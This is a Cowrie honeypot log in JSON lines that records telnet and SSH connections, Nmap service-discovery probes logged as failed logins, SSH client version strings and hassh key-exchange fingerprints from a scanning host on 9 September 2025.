{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:01.090722Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56652,"dst_ip":"1.2.3.4","dst_port":23,"session":"46261dba7c03","protocol":"telnet","message":"New connection: 212.227.235.229:56652 (1.2.3.4:23) [session: 46261dba7c03]","sensor":"my-vps","timestamp":"2025-09-09T04:51:02.645379Z"}
{"eventid":"cowrie.session.closed","duration":13.137936353683472,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:03.870329Z","src_ip":"212.227.125.160","session":"22483ab43528"}
{"eventid":"cowrie.session.closed","duration":4.9866862297058105,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:06.070252Z","src_ip":"172.105.246.139","session":"227e268c2270"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":49756,"dst_ip":"1.2.3.4","dst_port":23,"session":"661b40df7f57","protocol":"telnet","message":"New connection: 172.105.246.139:49756 (1.2.3.4:23) [session: 661b40df7f57]","sensor":"my-vps","timestamp":"2025-09-09T04:51:06.094622Z"}
{"eventid":"cowrie.session.closed","duration":7.499114513397217,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:13.593663Z","src_ip":"172.105.246.139","session":"661b40df7f57"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":58418,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e28f1fd272e","protocol":"telnet","message":"New connection: 172.105.246.139:58418 (1.2.3.4:23) [session: 5e28f1fd272e]","sensor":"my-vps","timestamp":"2025-09-09T04:51:13.612823Z"}
{"eventid":"cowrie.session.closed","duration":5.005147218704224,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:18.617893Z","src_ip":"172.105.246.139","session":"5e28f1fd272e"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":58424,"dst_ip":"1.2.3.4","dst_port":23,"session":"83afc7adc055","protocol":"telnet","message":"New connection: 172.105.246.139:58424 (1.2.3.4:23) [session: 83afc7adc055]","sensor":"my-vps","timestamp":"2025-09-09T04:51:18.636997Z"}
{"eventid":"cowrie.session.closed","duration":0.0015380382537841797,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:18.638440Z","src_ip":"172.105.246.139","session":"83afc7adc055"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":58430,"dst_ip":"1.2.3.4","dst_port":23,"session":"c4331d8ce690","protocol":"telnet","message":"New connection: 172.105.246.139:58430 (1.2.3.4:23) [session: c4331d8ce690]","sensor":"my-vps","timestamp":"2025-09-09T04:51:18.677437Z"}
{"eventid":"cowrie.session.closed","duration":5.004461050033569,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:23.681832Z","src_ip":"172.105.246.139","session":"c4331d8ce690"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":51982,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e28b1d48781","protocol":"telnet","message":"New connection: 172.105.246.139:51982 (1.2.3.4:23) [session: 5e28b1d48781]","sensor":"my-vps","timestamp":"2025-09-09T04:51:23.702413Z"}
{"eventid":"cowrie.session.closed","duration":0.0012502670288085938,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:23.703571Z","src_ip":"172.105.246.139","session":"5e28b1d48781"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":51986,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f8692014fa5","protocol":"telnet","message":"New connection: 172.105.246.139:51986 (1.2.3.4:23) [session: 6f8692014fa5]","sensor":"my-vps","timestamp":"2025-09-09T04:51:23.745618Z"}
{"eventid":"cowrie.session.closed","duration":5.0498645305633545,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.795404Z","src_ip":"172.105.246.139","session":"6f8692014fa5"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":51994,"dst_ip":"1.2.3.4","dst_port":23,"session":"26915dffe4a2","protocol":"telnet","message":"New connection: 172.105.246.139:51994 (1.2.3.4:23) [session: 26915dffe4a2]","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.858063Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS sip:nm SIP/2.0","password":"Via: SIP/2.0/TCP nm;branch=foo","message":"login attempt [OPTIONS sip:nm SIP/2.0/Via: SIP/2.0/TCP nm;branch=foo] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.859420Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.login.failed","username":"From: <sip:nm@nm>;tag=root","password":"To: <sip:nm2@nm2>","message":"login attempt [From: <sip:nm@nm>;tag=root/To: <sip:nm2@nm2>] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.860270Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.login.failed","username":"Call-ID: 50000","password":"CSeq: 42 OPTIONS","message":"login attempt [Call-ID: 50000/CSeq: 42 OPTIONS] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.861192Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.login.failed","username":"Max-Forwards: 70","password":"Content-Length: 0","message":"login attempt [Max-Forwards: 70/Content-Length: 0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.862357Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.login.failed","username":"Contact: <sip:nm@nm>","password":"Accept: application/sdp","message":"login attempt [Contact: <sip:nm@nm>/Accept: application/sdp] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:28.863485Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.session.closed","duration":30.49332618713379,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:33.138613Z","src_ip":"212.227.235.229","session":"46261dba7c03"}
{"eventid":"cowrie.session.closed","duration":7.463834285736084,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:36.321817Z","src_ip":"172.105.246.139","session":"26915dffe4a2"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":44860,"dst_ip":"1.2.3.4","dst_port":23,"session":"05fa2b7c97ae","protocol":"telnet","message":"New connection: 172.105.246.139:44860 (1.2.3.4:23) [session: 05fa2b7c97ae]","sensor":"my-vps","timestamp":"2025-09-09T04:51:36.341685Z"}
{"eventid":"cowrie.session.closed","duration":5.0176708698272705,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:41.359283Z","src_ip":"172.105.246.139","session":"05fa2b7c97ae"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":44876,"dst_ip":"1.2.3.4","dst_port":23,"session":"38b97e7ef95a","protocol":"telnet","message":"New connection: 172.105.246.139:44876 (1.2.3.4:23) [session: 38b97e7ef95a]","sensor":"my-vps","timestamp":"2025-09-09T04:51:41.390213Z"}
{"eventid":"cowrie.login.failed","username":"GET /devicedesc.xml HTTP/1.1","password":"","message":"login attempt [GET /devicedesc.xml HTTP/1.1/] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:41.391833Z","src_ip":"172.105.246.139","session":"38b97e7ef95a"}
{"eventid":"cowrie.session.closed","duration":4.994033336639404,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:46.384176Z","src_ip":"172.105.246.139","session":"38b97e7ef95a"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":48440,"dst_ip":"1.2.3.4","dst_port":23,"session":"f95e9a3adf79","protocol":"telnet","message":"New connection: 172.105.246.139:48440 (1.2.3.4:23) [session: f95e9a3adf79]","sensor":"my-vps","timestamp":"2025-09-09T04:51:46.408025Z"}
{"eventid":"cowrie.login.failed","username":"CONNECT","password":"accept-version:1.2","message":"login attempt [CONNECT/accept-version:1.2] failed","sensor":"my-vps","timestamp":"2025-09-09T04:51:46.409099Z","src_ip":"172.105.246.139","session":"f95e9a3adf79"}
{"eventid":"cowrie.session.closed","duration":5.0029616355896,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.410877Z","src_ip":"172.105.246.139","session":"f95e9a3adf79"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":48456,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf14a11ae003","protocol":"telnet","message":"New connection: 172.105.246.139:48456 (1.2.3.4:23) [session: bf14a11ae003]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.492311Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41680,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e2da329c13","protocol":"ssh","message":"New connection: 172.105.246.139:41680 (1.2.3.4:22) [session: 61e2da329c13]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.493939Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41692,"dst_ip":"1.2.3.4","dst_port":22,"session":"a37bd3f816c9","protocol":"ssh","message":"New connection: 172.105.246.139:41692 (1.2.3.4:22) [session: a37bd3f816c9]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.495197Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"78fc04b7f11c","protocol":"ssh","message":"New connection: 172.105.246.139:41704 (1.2.3.4:22) [session: 78fc04b7f11c]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.496067Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":48476,"dst_ip":"1.2.3.4","dst_port":23,"session":"d41cdd918951","protocol":"telnet","message":"New connection: 172.105.246.139:48476 (1.2.3.4:23) [session: d41cdd918951]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.496814Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":48462,"dst_ip":"1.2.3.4","dst_port":23,"session":"02144e3a9487","protocol":"telnet","message":"New connection: 172.105.246.139:48462 (1.2.3.4:23) [session: 02144e3a9487]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.497885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap_SSH2_Enum_Algos","message":"Remote SSH version: SSH-2.0-Nmap_SSH2_Enum_Algos","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.556777Z","src_ip":"172.105.246.139","session":"78fc04b7f11c"}
{"eventid":"cowrie.session.closed","duration":0.06209611892700195,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.558869Z","src_ip":"172.105.246.139","session":"d41cdd918951"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.606752Z","src_ip":"172.105.246.139","session":"61e2da329c13"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.607271Z","src_ip":"172.105.246.139","session":"a37bd3f816c9"}
{"eventid":"cowrie.session.closed","duration":0.22770190238952637,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.725573Z","src_ip":"172.105.246.139","session":"02144e3a9487"}
{"eventid":"cowrie.client.kex","hassh":"a20aced7c9824fd804f59e68dd801ad3","hasshAlgorithms":"diffie-hellman-group1-sha1;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1"],"keyAlgs":["ssh-dss","ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a20aced7c9824fd804f59e68dd801ad3","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.727534Z","src_ip":"172.105.246.139","session":"78fc04b7f11c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.729117Z","src_ip":"172.105.246.139","session":"78fc04b7f11c"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41716,"dst_ip":"1.2.3.4","dst_port":22,"session":"d93e9d6ac76a","protocol":"ssh","message":"New connection: 172.105.246.139:41716 (1.2.3.4:22) [session: d93e9d6ac76a]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.900932Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41730,"dst_ip":"1.2.3.4","dst_port":22,"session":"eee89bae580f","protocol":"ssh","message":"New connection: 172.105.246.139:41730 (1.2.3.4:22) [session: eee89bae580f]","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.901962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.10.0","message":"Remote SSH version: SSH-2.0-libssh2_1.10.0","sensor":"my-vps","timestamp":"2025-09-09T04:51:51.916405Z","src_ip":"172.105.246.139","session":"eee89bae580f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.030888Z","src_ip":"172.105.246.139","session":"d93e9d6ac76a"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41746,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f3ffac57f1","protocol":"ssh","message":"New connection: 172.105.246.139:41746 (1.2.3.4:22) [session: 95f3ffac57f1]","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.031723Z"}
{"eventid":"cowrie.client.kex","hassh":"b4b8ae3d7241d2c1dc54b4df7e8c19d1","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b4b8ae3d7241d2c1dc54b4df7e8c19d1","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.032538Z","src_ip":"172.105.246.139","session":"eee89bae580f"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41748,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb61bc5f7d44","protocol":"ssh","message":"New connection: 172.105.246.139:41748 (1.2.3.4:22) [session: eb61bc5f7d44]","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.124215Z"}
{"eventid":"cowrie.client.version","version":"SSH-1.5-Nmap-SSH1-Hostkey","message":"Remote SSH version: SSH-1.5-Nmap-SSH1-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.363383Z","src_ip":"172.105.246.139","session":"95f3ffac57f1"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.365058Z","src_ip":"172.105.246.139","session":"95f3ffac57f1"}
{"eventid":"cowrie.client.version","version":"SSH-1.5-NmapNSE_1.0","message":"Remote SSH version: SSH-1.5-NmapNSE_1.0","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.415402Z","src_ip":"172.105.246.139","session":"eb61bc5f7d44"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.416589Z","src_ip":"172.105.246.139","session":"eb61bc5f7d44"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":41758,"dst_ip":"1.2.3.4","dst_port":22,"session":"f21d4867ee75","protocol":"ssh","message":"New connection: 172.105.246.139:41758 (1.2.3.4:22) [session: f21d4867ee75]","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.582861Z"}
{"eventid":"cowrie.session.closed","duration":1.19370436668396,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.685949Z","src_ip":"172.105.246.139","session":"bf14a11ae003"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.758800Z","src_ip":"172.105.246.139","session":"f21d4867ee75"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.799026Z","src_ip":"172.105.246.139","session":"eee89bae580f"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-dss"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.817235Z","src_ip":"172.105.246.139","session":"f21d4867ee75"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.818233Z","src_ip":"172.105.246.139","session":"f21d4867ee75"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":34390,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f41ab1b470c","protocol":"ssh","message":"New connection: 172.105.246.139:34390 (1.2.3.4:22) [session: 8f41ab1b470c]","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.925062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:52.983227Z","src_ip":"172.105.246.139","session":"8f41ab1b470c"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:51:58.347918Z","src_ip":"172.105.246.139","session":"8f41ab1b470c"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:58.385474Z","src_ip":"172.105.246.139","session":"a37bd3f816c9"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:58.641421Z","src_ip":"172.105.246.139","session":"8f41ab1b470c"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":34400,"dst_ip":"1.2.3.4","dst_port":22,"session":"3858e8d0a3ae","protocol":"ssh","message":"New connection: 172.105.246.139:34400 (1.2.3.4:22) [session: 3858e8d0a3ae]","sensor":"my-vps","timestamp":"2025-09-09T04:51:58.747807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.031931Z","src_ip":"172.105.246.139","session":"3858e8d0a3ae"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp256"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.230498Z","src_ip":"172.105.246.139","session":"3858e8d0a3ae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.413212Z","src_ip":"172.105.246.139","session":"3858e8d0a3ae"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":34414,"dst_ip":"1.2.3.4","dst_port":22,"session":"b55b29604bb5","protocol":"ssh","message":"New connection: 172.105.246.139:34414 (1.2.3.4:22) [session: b55b29604bb5]","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.461677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.593673Z","src_ip":"172.105.246.139","session":"b55b29604bb5"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp384"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.640805Z","src_ip":"172.105.246.139","session":"b55b29604bb5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.641937Z","src_ip":"172.105.246.139","session":"b55b29604bb5"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":34424,"dst_ip":"1.2.3.4","dst_port":22,"session":"27262819463e","protocol":"ssh","message":"New connection: 172.105.246.139:34424 (1.2.3.4:22) [session: 27262819463e]","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.756326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.843648Z","src_ip":"172.105.246.139","session":"27262819463e"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp521"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.892115Z","src_ip":"172.105.246.139","session":"27262819463e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:59.893840Z","src_ip":"172.105.246.139","session":"27262819463e"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":34432,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec42e64fa55b","protocol":"ssh","message":"New connection: 172.105.246.139:34432 (1.2.3.4:22) [session: ec42e64fa55b]","sensor":"my-vps","timestamp":"2025-09-09T04:52:00.038651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-09-09T04:52:00.099081Z","src_ip":"172.105.246.139","session":"ec42e64fa55b"}
